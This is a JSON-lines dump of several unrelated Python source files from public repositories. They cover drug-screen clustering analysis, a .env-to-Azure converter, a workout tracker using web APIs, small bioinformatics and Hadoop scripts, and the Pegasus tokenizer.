drugs[100]\n\n idx = [x == drug for x in drugs]\n idx = np.array(idx, dtype='bool')\n\n conc_sub = np.array(concs, dtype='float')[idx]\n label_sub = np.array(cluster_labels)[idx]\n\n drug_label = np.empty(shape=(0,5))\n\n drug_name = []\n\n if drug != 'PBS':\n\n if len(set(conc_sub)) == 5:\n\n iter_conc = 0\n\n for conc in sorted(set(conc_sub), reverse=True):\n #conc = sorted(set(conc_sub), reverse=True)[3]\n\n idx_conc = [x == conc for x in conc_sub]\n idx_conc = np.array(idx_conc, dtype='bool')\n\n label_for_conc = label_sub[idx_conc]\n\n label_per_concentration = [0]*len(set(cluster_labels))\n\n for label in sorted(set(label_sub), reverse=False):\n label_per_concentration[label] = label_per_concentration[label] + sum(label_for_conc == label)\n\n conc_summary_by_label[iter_conc,:] = conc_summary_by_label[iter_conc,:] +label_per_concentration\n\n iter_conc = iter_conc + 1\n\n label_drug = label_sub[idx_conc]\n\n label_drug = label_drug.reshape(1, 5)\n\n drug_label = np.append(drug_label, label_drug, axis=0)\n\n drug_name.append(drug)\n else:\n pass\n else:\n pass\n\n new_path = path_fig+'\\\\'+ drug\n\n if os.path.exists(new_path) == False:\n os.makedirs(new_path)\n else:\n pass\n\n os.chdir(new_path)\n\n heat = sns.heatmap(drug_label,\n yticklabels = drug_name\n )\n\n plt.savefig(\"heatmap.svg\")\n\n #plt.show()\n plt.close(\"all\")\n\n del new_path\n\n\ndef biological_inference_of_clusters(chosen_cluster ,\n path_fig\n ):\n\n labels_eff = chosen_cluster\n\n noEffect = [0,4, 5, 7] #as 0\n mixedEffect = [2,6] #as 1\n cytostatic = [3] #as 2\n cytotoxic = [1] #as 3\n\n labels_eff = [\"No Effect\" if x in set(noEffect) else x for x in labels_eff]\n labels_eff = [\"Mixed Effect\" if x in set(mixedEffect) else x for x in labels_eff]\n labels_eff = [\"Cytostatic\" if x in set(cytostatic) else x for x in labels_eff]\n labels_eff = [\"Cytotoxic\" if x in set(cytotoxic) else x for x in labels_eff]\n\n labels_eff = [0 if x == \"No Effect\" else x for x in labels_eff]\n labels_eff = [1 if x == \"Mixed Effect\" else x for x in labels_eff]\n labels_eff = [2 if x == \"Cytostatic\" else x for x in labels_eff]\n labels_eff = [3 if x == \"Cytotoxic\" else x for x in labels_eff]\n\n drug_centric_analysis(metadata = metadata,\n cluster_labels = labels_eff,\n path_fig = path_fig,\n heatmap_label=\"_drug_effect2_cell-drug_scaled_denoise_eff\")\n return(labels_eff)\n\ndef get_drug_position(path_data_file):\n os.chdir(path_data_file)\n\n MSP1 = pd.read_excel('randomized_layout_1MSP_batch2.xls')\n MSP1['MSP_plate'] = \"P1\"\n MSP2 = pd.read_excel('randomized_layout_2MSP_batch2.xls')\n MSP2['MSP_plate'] = \"P2\"\n\n MSP_full = [MSP1, MSP2]\n\n MSP_full = pd.concat(MSP_full)\n\n return(MSP_full)\n\n\ndef get_raw_images(metadata,\n cluster_labels,\n output_path,\n n_images_per_cluster\n ):\n\n drug_map = get_drug_position('\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\clean_data')\n drugs = metadata['drug']\n cells = metadata['cell']\n concs = metadata['conc']\n\n cells_image_dir = []\n\n for n in range(1,8):\n batch = \"batch_{}/\".format(str(n))\n batch_in = \"\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users/Mauro/Cell_culture_data/190310_LargeScreen/imageData/\" + batch\n\n cell_in_batch_dir = [x.path for x in os.scandir(batch_in) if x.is_dir()]\n\n [cells_image_dir.append(x) for x in cell_in_batch_dir]\n\n for cluster in range(0,max(cluster_labels)+1):\n #cluster = 2\n #subset list of clusters from metadata\n\n output_path_cluster = output_path+\"/cluster_{}/\".format(str(cluster))\n\n if not os.path.exists(output_path_cluster):\n os.makedirs(output_path_cluster)\n else:\n pass\n\n idx = [x == cluster for x in labels]\n idx = np.array(idx, dtype='bool')\n\n drug_sub = np.array(drugs)[idx]\n cell_sub = np.array(cells)[idx]\n conc_sub = np.array(concs)[idx]\n\n #take 15 random samples from the clusters\n\n idx_random = sample(range(0,len(drug_sub)), n_images_per_cluster)\n\n drug_rand = np.array(drug_sub)[idx_random]\n cell_rand = np.array(cell_sub)[idx_random]\n conc_rand = np.array(conc_sub)[idx_random]\n\n for idx in range(0,len(drug_rand)):\n #idx = 1\n\n drug_to_map = drug_rand[idx]\n cell_to_map = cell_rand[idx]\n conc_to_map = conc_rand[idx]\n\n #convert concentration into well (available in drug map)\n\n d1 = np.array(drug_map[\"Drug\"] == drug_to_map, dtype='bool')\n d2 = np.array(drug_map[\"Final_conc_uM\"].round(5) == float(conc_to_map), dtype = 'bool')\n\n well_to_search = drug_map[d1 & d2 ]\n\n plate_to_search = well_to_search[\"MSP_plate\"].unique()\n\n batch_matched = re.compile(\".*({}).*\".format(cell_to_map))\n\n if len(plate_to_search) > 1:\n exit()\n else:\n pass\n\n\n cell_folder = [x for x in cells_image_dir if batch_matched.search(x)]\n\n if plate_to_search== \"P1\":\n match_pattern = \".*({}).*\".format(\"P1\")\n plate_to_match = re.compile(match_pattern)\n plate_to_match = [x for x in cell_folder if plate_to_match.search(x)]\n else:\n pass\n\n if plate_to_search == \"P2\":\n match_pattern = \".*({}).*\".format(\"P2\")\n plate_to_match = re.compile(match_pattern)\n plate_to_match = [x for x in cell_folder if plate_to_match.search(x)]\n else:\n pass\n\n os.chdir(plate_to_match[0])\n\n well_position_list = []\n\n for x in range(0,len(well_to_search)):\n #x = 0\n\n col = well_to_search['Column'].to_list()[x]\n row = well_to_search.iloc[x]['Row']\n well_position = row + str(col)\n\n well_position_list.append(well_position)\n\n well_position_list = [\"_{}_\".format(x) for x in well_position_list]\n\n images_to_move = []\n\n for x in os.listdir():\n\n if bool(re.search(\"|\".join(well_position_list), x)) == True:\n images_to_move.append(x)\n else:\n pass\n\n for image in images_to_move:\n\n os.chdir(plate_to_match[0])\n\n image_file = Image.open(image)\n\n os.chdir(output_path_cluster)\n\n image_file.save(image)\n\nif __name__ == \"__main__\":\n\n path_data_file = '\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\clean_data'\n path_fig = '\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\figures\\\\pheno-ml'\n path_out = '\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\clean_data\\\\cluster_pheno-ml'\n\n data_file = 'dist_combined_celldrug-scaled_denoise.npy'\n\n os.chdir(path_data_file)\n\n data = np.load(data_file)\n\n metadata_file = 'metadata-pheno-ml.json'\n\n summary_eval_metrics = np.empty(shape=(0, 3))\n\n list_nclus = []\n\n with open(metadata_file) as output_file:\n metadata = json.load(output_file)\n\n for idx in range(2,10):\n 'iterate for different number of clusters'\n #idx = 8\n\n list_nclus.append(idx)\n\n labels = run_clustering_methods(data = data,\n path_fig = path_fig,\n path_out = path_out,\n n_clusters = idx,\n hist_plot = \"clusters-celldrug-scaled_denoise\",\n cluster_plot = '_kmeans_cell-drugscaled_denoise_avg'\n )\n\n metric = cluster_eval_metrics(X = data,\n labels = labels,\n metric = 'euclidean')\n\n metric = np.array(metric).reshape(1,3)\n\n summary_eval_metrics = np.append(summary_eval_metrics, metric, axis = 0)\n\n drug_centric_analysis(metadata = metadata,\n cluster_labels = labels,\n path_fig = path_fig,\n heatmap_label=\"_drug_effect2_cell-drug_scaled_denoise\")\n\n cell_freq_by_cluster(metadata = metadata,\n cluster_labels = labels,\n path_fig = path_fig,\n heatmap_label = \"freq-by-cell\"\n )\n\n cell_centric_analysis(metadata=metadata,\n cluster_labels=labels,\n path_fig=path_fig,\n heatmap_label=\"-heatmap_cell-drug_scaled2\")\n\n #TODO fix conc_centric_analysis\n\n # conc_centric_analysis(metadata=metadata,\n # cluster_labels=labels,\n # path_fig=path_fig)\n\n np.save('eval_metric', summary_eval_metrics)\n\n os.chdir(path_fig)\n\n plot_eval_metrics(list_nclus,\n summary_eval_metrics,\n path_fig)\n os.chdir(path_out)\n\n labels = np.load(\"labels_nclus_8.npy\")\n\n get_raw_images(metadata=metadata,\n cluster_labels=labels,\n output_path='\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\figures\\\\pheno-ml\\\\images_by_cluster',\n n_images_per_cluster=3\n )\n\n labels_eff = biological_inference_of_clusters(chosen_cluster = labels,\n path_fig = path_fig)\n\n os.chdir(path_out)\n\n np.save('labels_nclus_bio-effect', labels_eff)\n\n get_raw_images(metadata = metadata,\n cluster_labels = labels_eff,\n output_path='\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\figures\\\\pheno-ml\\\\images_by_cluster_eff',\n n_images_per_cluster=3\n )\n\n drug_centric_analysis(metadata=metadata,\n cluster_labels=labels_eff,\n path_fig=path_fig,\n heatmap_label=\"_drug_biological_labels\")\n\n drug_conc_centric_analysis(metadata = metadata,\n cluster_labels=labels_eff,\n path_fig = path_fig)\n\n max_conc_analysis(metadata = metadata,\n cluster_labels = labels_eff,\n path_fig = path_fig,\n heatmap_label= \"max_conc_gram\")\n\n\n\n\n","repo_name":"mauromiguelm/toxicity-classifier","sub_path":"main/cluster_of_distances.py","file_name":"cluster_of_distances.py","file_ext":"py","file_size_in_byte":26372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"17988387295","text":"import json\nimport os\nimport re\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser(\n prog=\"env2azure\",\n description=(\n \"Converts a .env to file to the equivalent json file which can\"\n \" be used to configure an Azure App Service.\"\n ),\n)\nparser.add_argument(\"file_path\", help=\"Absolute path to the .env file to be converted\")\nparser.add_argument(\n \"--add\",\n nargs=\"*\",\n help=(\"Adds additional environment variables. Should follow format\" ' VAR=\"value\"'),\n)\nparser.add_argument(\n \"--o\",\n nargs=\"?\",\n default=os.path.join(os.getcwd(), \"azure_settings.json\"),\n help=(\n \"Path to the output file. By default, creates a JSON file named\"\n \" azure_settings.json in the current directory.\"\n ),\n)\n\n\ndef convert_dotenv_to_env_dict(file_path: str, extras: list[str]):\n env_dict = {}\n\n if len(extras) != 0:\n for extra in extras:\n var, value = extra.split(\"=\", 1)\n env_dict[var] = value\n \n with open(file_path, \"r\") as file:\n for line in file.readlines():\n line = line.strip()\n line = line.strip(\"\\n\")\n\n # ignoring new lines and comments\n if len(line) > 0 and line[0] != \"#\":\n var, value = line.split(\"=\", 1)\n value = value.strip()\n var = var.strip()\n\n # removing quotes to avoid weird strings\n if value[0] == '\"':\n value = value[1:-1]\n \n env_dict[var] = value\n \n return env_dict\n\n\ndef format_variables(env_dict: dict[str, str]):\n for key in env_dict:\n if \"${\" in env_dict[key]:\n key_list = re.findall(r'\\$\\{(?P[A-Z_]+)\\}', env_dict[key])\n env_dict[key] = env_dict[key].replace(\"${\", \"{\")\n format_dict = { i: env_dict[i] for i in key_list }\n value = env_dict[key].format(**format_dict)\n env_dict[key] = value\n return env_dict\n\n\ndef convert_dotenv_to_json(file_path: str, extras: list[str], output_file_path: str):\n json_data = []\n env_dict = convert_dotenv_to_env_dict(file_path, extras)\n env_dict = format_variables(env_dict)\n\n for key, value in env_dict.items():\n json_data.append({\n \"name\": key,\n \"value\": value,\n \"slotSetting\": False\n })\n\n if output_file_path is None:\n output_file_path = os.path.join(os.getcwd(), \"azure_settings.json\")\n\n with open(output_file_path, \"w\") as json_file:\n json.dump(json_data, json_file, indent=4)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n convert_dotenv_to_json(args.file_path, args.add, args.o)\n","repo_name":"IshaanBoseCS/env2azure","sub_path":"dotenv_to_azure_settings.py","file_name":"dotenv_to_azure_settings.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19046770411","text":"import requests\nfrom dotenv import load_dotenv\nimport os\nimport datetime as dt\n\nGENDER = \"Male\"\nWEIGHT_KG = 75\nHEIGHT_CM = 178\nAGE = 39\n\n# getting actual directory and making a rel path\nREL_PATH = f\"{os.path.dirname(__file__)}/\"\n\n# loading environment variables\nload_dotenv(dotenv_path=f\"{REL_PATH}.env\")\n\n# exercise API\nNUTRITIONIX_APPID = os.getenv(\"NUTRITIONIX_APPID\")\nNUTRITIONIX_APIKEY = os.getenv(\"NUTRITIONIX_APIKEY\")\nNUTRITIONIX_ENDPOINT = \"https://trackapi.nutritionix.com/v2/natural/exercise\"\nNUTRITIONIX_HEADERS = {\n \"x-app-id\": NUTRITIONIX_APPID,\n \"x-app-key\": NUTRITIONIX_APIKEY,\n \"Content-Type\": \"application/json\",\n}\nexercise_data = {\n \"query\": \"2 hour cycling\",\n # \"query\": input(\"Type the exercise: \"),\n \"gender\": GENDER,\n \"weight_kg\": WEIGHT_KG,\n \"height_cm\": HEIGHT_CM,\n \"age\": AGE\n}\nresponse = requests.post(url=NUTRITIONIX_ENDPOINT,\n headers=NUTRITIONIX_HEADERS,\n json=exercise_data)\nexercise_response = response.json()[\"exercises\"][0]\nexercise_name = exercise_response[\"name\"]\nexercise_duration = exercise_response[\"duration_min\"]\nexercise_calories = exercise_response[\"nf_calories\"]\n\ntoday = dt.datetime.now()\ntoday_date = today.strftime(\"%d/%m/%Y\")\ntoday_time = today.strftime(\"%X\")\n\n# sheet write API\nSHEETY_API_ENDPOINT = \"https://api.sheety.co/3955488f8ee023601d308d21b9639dd3/myWorkouts/home\"\nSHEETY_APIKEY = os.getenv(\"SHEETY_APIKEY\")\nSHEETY_HEADERS = {\n \"Authorization\": SHEETY_APIKEY,\n \"Content-Type\": \"application/json\"\n}\nsheet_data = {\n \"home\": {\n \"date\": today_date,\n \"time\": today_time,\n \"exercise\": exercise_name,\n \"duration\": exercise_duration,\n \"calories\": exercise_calories,\n }\n}\nresponse = requests.post(url=SHEETY_API_ENDPOINT,\n headers=SHEETY_HEADERS,\n json=sheet_data)","repo_name":"davibelo/python-pro-bootcamp-2021","sub_path":"04-projects-UsingWebAPIs/08-workoutTracking/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28638350252","text":"import os\nos.chdir(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\python_operation\")\nos.getcwd()\nf = open('rosalind_hamm.txt','r')\n\nlines = f.readlines()\n\nf.close()\n\ns1 = lines[0].strip()\n\ns2 = lines[1].strip()\n\nhd = 0\n\nfor i in range(len(s1)):\n\n if s1[i] != s2[i]:\n\n hd += 1\n\nprint(hd)","repo_name":"CoolEvilgenius/notes_2020_zhiyuanli","sub_path":"rosalind/rosalind_code/practice_rosalind_6.py","file_name":"practice_rosalind_6.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71636526679","text":"#!/usr/bin/env python\n\nimport sys\n\nfor line in sys.stdin:\n line = line.strip()\n key = line.split(',')[0]\n value = line.split(',')[1]\n if value == 'ABC' or value.isdigit():\n print('{0}\\t{1}'.format(key, value))\n\n","repo_name":"learicard/coursework","sub_path":"hadoop/assignments/ex1/join2_mapper.py","file_name":"join2_mapper.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21461669487","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\n\ndef hist_plot(dist):\n return plt.hist(dist, 50, normed=True, color='r', edgecolor='black', linewidth=0.5)\n\ndef beautiful_bins(bins, y_line, title=\"Test\", x_label=\"X Label\", y_label=\"Y Label\", format=\"png\"):\n plt.title(title)\n plt.plot(bins, y_line, linewidth=2, color='black')\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n ax = plt.subplot(111)\n ax.set_ylim(ymin=0)\n ax.set_xlim(xmin=0)\n plt.savefig(\"./imgs/{}.{}\".format(title.lower(), format), format=format)\n plt.show()","repo_name":"sacry-/mdp4","sub_path":"mesa_tb/testing/pystyler.py","file_name":"pystyler.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28703017754","text":"import os\nfrom shutil import copyfile\nfrom typing import Any, Dict, List, Optional, Tuple\n\nimport sentencepiece as spm\n\nfrom ...tokenization_utils import AddedToken, PreTrainedTokenizer\nfrom ...utils import logging\n\n\nSPIECE_UNDERLINE = \"▁\"\n\nVOCAB_FILES_NAMES = {\"vocab_file\": \"spiece.model\"}\n\nPRETRAINED_VOCAB_FILES_MAP = {\n \"vocab_file\": {\"google/pegasus-xsum\": \"https://huggingface.co/google/pegasus-xsum/resolve/main/spiece.model\"}\n}\n\nPRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {\n \"google/pegasus-xsum\": 512,\n}\n\n\nlogger = logging.get_logger(__name__)\n\n\n# TODO ArthurZ refactor this to only use the added_tokens_encoder\nclass PegasusTokenizer(PreTrainedTokenizer):\n r\"\"\"\n Construct a PEGASUS tokenizer. Based on [SentencePiece](https://github.com/google/sentencepiece).\n\n This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to\n this superclass for more information regarding those methods.\n\n Args:\n vocab_file (`str`):\n [SentencePiece](https://github.com/google/sentencepiece) file (generally has a *.spm* extension) that\n contains the vocabulary necessary to instantiate a tokenizer.\n pad_token (`str`, *optional*, defaults to `\"\"`):\n The token used for padding, for example when batching sequences of different lengths.\n eos_token (`str`, *optional*, defaults to `\"
\"`):\n The end of sequence token.\n\n \n\n When building a sequence using special tokens, this is not the token that is used for the end of sequence.\n The token used is the `sep_token`.\n\n \n\n unk_token (`str`, *optional*, defaults to `\"\"`):\n The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this\n token instead.\n mask_token (`str`, *optional*, defaults to `\"\"`):\n The token used for masking single token values. This is the token used when training this model with masked\n language modeling (MLM). This is the token that the PEGASUS encoder will try to predict during pretraining.\n It corresponds to *[MASK2]* in [PEGASUS: Pre-training with Extracted Gap-sentences for Abstractive\n Summarization](https://arxiv.org/pdf/1912.08777.pdf).\n mask_token_sent (`str`, *optional*, defaults to `\"\"`):\n The token used for masking whole target sentences. This is the token used when training this model with gap\n sentences generation (GSG). This is the sentence that the PEGASUS decoder will try to predict during\n pretraining. It corresponds to *[MASK1]* in [PEGASUS: Pre-training with Extracted Gap-sentences for\n Abstractive Summarization](https://arxiv.org/pdf/1912.08777.pdf).\n additional_special_tokens (`List[str]`, *optional*):\n Additional special tokens used by the tokenizer. If no additional_special_tokens are provided and\n are used as additional special tokens corresponding to the [original PEGASUS\n tokenizer](https://github.com/google-research/pegasus/blob/939830367bcf411193d2b5eca2f2f90f3f9260ca/pegasus/ops/pretrain_parsing_ops.cc#L66)\n that uses the tokens 2 - 104 only for pretraining\n sp_model_kwargs (`dict`, *optional*):\n Will be passed to the `SentencePieceProcessor.__init__()` method. The [Python wrapper for\n SentencePiece](https://github.com/google/sentencepiece/tree/master/python) can be used, among other things,\n to set:\n\n - `enable_sampling`: Enable subword regularization.\n - `nbest_size`: Sampling parameters for unigram. Invalid for BPE-Dropout.\n\n - `nbest_size = {0,1}`: No sampling is performed.\n - `nbest_size > 1`: samples from the nbest_size results.\n - `nbest_size < 0`: assuming that nbest_size is infinite and samples from the all hypothesis (lattice)\n using forward-filtering-and-backward-sampling algorithm.\n\n - `alpha`: Smoothing parameter for unigram sampling, and dropout probability of merge operations for\n BPE-dropout.\n \"\"\"\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n model_input_names = [\"input_ids\", \"attention_mask\"]\n\n def __init__(\n self,\n vocab_file,\n pad_token=\"\",\n eos_token=\"\",\n unk_token=\"\",\n mask_token=\"\",\n mask_token_sent=\"\",\n additional_special_tokens=None,\n offset=103, # entries 2 - 104 are only used for pretraining\n sp_model_kwargs: Optional[Dict[str, Any]] = None,\n **kwargs,\n ) -> None:\n self.offset = offset\n if additional_special_tokens is not None:\n if not isinstance(additional_special_tokens, list):\n raise TypeError(\n f\"additional_special_tokens should be of type {type(list)}, but is\"\n f\" {type(additional_special_tokens)}\"\n )\n additional_special_tokens_extended = (\n ([mask_token_sent] + additional_special_tokens)\n if mask_token_sent not in additional_special_tokens and mask_token_sent is not None\n else additional_special_tokens\n )\n # fill additional tokens with ..., in case not all additional tokens are already taken\n additional_special_tokens_extended += [\n f\"\" for i in range(len(additional_special_tokens_extended), self.offset - 1)\n ]\n\n if len(set(additional_special_tokens_extended)) != len(additional_special_tokens_extended):\n raise ValueError(\n \"Please make sure that the provided additional_special_tokens do not contain an incorrectly\"\n f\" shifted list of tokens. Found {additional_special_tokens_extended}.\"\n )\n additional_special_tokens = additional_special_tokens_extended\n else:\n additional_special_tokens_extended = []\n additional_special_tokens = [mask_token_sent] if mask_token_sent is not None else []\n additional_special_tokens += [f\"\" for i in range(2, self.offset)]\n\n self.sp_model_kwargs = {} if sp_model_kwargs is None else sp_model_kwargs\n self.mask_token_sent = mask_token_sent\n self.vocab_file = vocab_file\n self.sp_model = spm.SentencePieceProcessor(**self.sp_model_kwargs)\n self.sp_model.Load(vocab_file)\n\n _added_tokens_decoder = {\n 0: AddedToken(str(pad_token), special=True),\n 1: AddedToken(str(eos_token), special=True),\n }\n\n if self.mask_token_sent is not None:\n _added_tokens_decoder[2] = AddedToken(mask_token_sent, special=True)\n _added_tokens_decoder[3] = AddedToken(str(mask_token), special=True)\n\n for i in range(2, self.offset):\n _added_tokens_decoder[len(_added_tokens_decoder)] = AddedToken(f\"\", special=True)\n\n # Force update as we want to make sure vocab is enforced (same as fast)\n self._added_tokens_decoder = kwargs.pop(\"added_tokens_decoder\", {})\n self._added_tokens_decoder.update(_added_tokens_decoder)\n\n super().__init__(\n eos_token=eos_token,\n unk_token=unk_token,\n mask_token=mask_token,\n pad_token=pad_token,\n mask_token_sent=mask_token_sent,\n offset=offset,\n additional_special_tokens=additional_special_tokens,\n sp_model_kwargs=self.sp_model_kwargs,\n **kwargs,\n )\n\n @property\n def vocab_size(self) -> int:\n return len(self.sp_model) + self.offset\n\n def get_vocab(self) -> Dict[str, int]:\n vocab = {self.convert_ids_to_tokens(i): i for i in range(self.vocab_size)}\n vocab.update(self.added_tokens_encoder)\n return vocab\n\n def __getstate__(self):\n state = self.__dict__.copy()\n state[\"sp_model\"] = None\n return state\n\n def __setstate__(self, d):\n self.__dict__ = d\n\n # for backward compatibility\n if not hasattr(self, \"sp_model_kwargs\"):\n self.sp_model_kwargs = {}\n\n self.sp_model = spm.SentencePieceProcessor(**self.sp_model_kwargs)\n self.sp_model.Load(self.vocab_file)\n\n def _tokenize(self, text: str) -> List[str]:\n \"\"\"Take as input a string and return a list of strings (tokens) for words/sub-words\"\"\"\n return self.sp_model.encode(text, out_type=str)\n\n def _convert_token_to_id(self, token: str) -> int:\n \"\"\"Converts a token (str) to an id using the vocab.\"\"\"\n sp_id = self.sp_model.piece_to_id(token)\n return sp_id + self.offset\n\n def _convert_id_to_token(self, index: int) -> str:\n \"\"\"Converts an index (integer) to a token (str) using the vocab.\"\"\"\n if index < self.offset:\n return self.sp_model.IdToPiece(index)\n token = self.sp_model.IdToPiece(index - self.offset)\n return token\n\n def convert_tokens_to_string(self, tokens):\n \"\"\"Converts a sequence of tokens (string) in a single string.\"\"\"\n current_sub_tokens = []\n out_string = \"\"\n for token in tokens:\n # make sure that special tokens are not decoded using sentencepiece model\n if token in self.all_special_tokens:\n out_string += self.sp_model.decode(current_sub_tokens) + token\n current_sub_tokens = []\n else:\n current_sub_tokens.append(token)\n out_string += self.sp_model.decode(current_sub_tokens)\n return out_string.strip()\n\n def num_special_tokens_to_add(self, pair=False):\n \"\"\"Just EOS\"\"\"\n return 1\n\n def _special_token_mask(self, seq):\n all_special_ids = set(self.all_special_ids) # call it once instead of inside list comp\n all_special_ids.remove(self.unk_token_id) # is only sometimes special\n\n return [1 if x in all_special_ids else 0 for x in seq]\n\n def get_special_tokens_mask(\n self, token_ids_0: List, token_ids_1: Optional[List] = None, already_has_special_tokens: bool = False\n ) -> List[int]:\n \"\"\"Get list where entries are [1] if a token is [eos] or [pad] else 0.\"\"\"\n if already_has_special_tokens:\n return self._special_token_mask(token_ids_0)\n elif token_ids_1 is None:\n return self._special_token_mask(token_ids_0) + [1]\n else:\n return self._special_token_mask(token_ids_0 + token_ids_1) + [1]\n\n def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None) -> List[int]:\n \"\"\"\n Build model inputs from a sequence or a pair of sequences for sequence classification tasks by concatenating\n and adding special tokens. A PEGASUS sequence has the following format, where `X` represents the sequence:\n\n - single sequence: `X `\n - pair of sequences: `A B ` (not intended use)\n\n BOS is never used. Pairs of sequences are not the expected use case, but they will be handled without a\n separator.\n\n Args:\n token_ids_0 (`List[int]`):\n List of IDs to which the special tokens will be added.\n token_ids_1 (`List[int]`, *optional*):\n Optional second list of IDs for sequence pairs.\n\n Returns:\n `List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.\n \"\"\"\n if token_ids_1 is None:\n return token_ids_0 + [self.eos_token_id]\n # We don't expect to process pairs, but leave the pair logic for API consistency\n return token_ids_0 + token_ids_1 + [self.eos_token_id]\n\n def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:\n if not os.path.isdir(save_directory):\n logger.error(f\"Vocabulary path ({save_directory}) should be a directory\")\n return\n out_vocab_file = os.path.join(\n save_directory, (filename_prefix + \"-\" if filename_prefix else \"\") + VOCAB_FILES_NAMES[\"vocab_file\"]\n )\n\n if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file) and os.path.isfile(self.vocab_file):\n copyfile(self.vocab_file, out_vocab_file)\n elif not os.path.isfile(self.vocab_file):\n with open(out_vocab_file, \"wb\") as fi:\n content_spiece_model = self.sp_model.serialized_model_proto()\n fi.write(content_spiece_model)\n\n return (out_vocab_file,)\n","repo_name":"huggingface/transformers","sub_path":"src/transformers/models/pegasus/tokenization_pegasus.py","file_name":"tokenization_pegasus.py","file_ext":"py","file_size_in_byte":12861,"program_lang":"python","lang":"en","doc_type":"code","stars":115573,"dataset":"github-code","pt":"85"} +{"seq_id":"13820581922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 28 23:36:18 2018\n\n@author: in-qu\n\"\"\"\nimport numpy as np\nfrom sigmoid import sigmoid\n\ndef costFunction(theta, X, y):\n theta = theta.reshape(-1,1)\n y = y.reshape(-1,1)\n m = len(y)\n J = -1 / m * (y.T @ np.log(sigmoid(X @ theta)) + (1 - y.T) @ np.log(1 - sigmoid(X @ theta)))\n \n return J\n \n ","repo_name":"agasca94/MachineLearningExercises","sub_path":"ex2-python/costFunction.py","file_name":"costFunction.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"}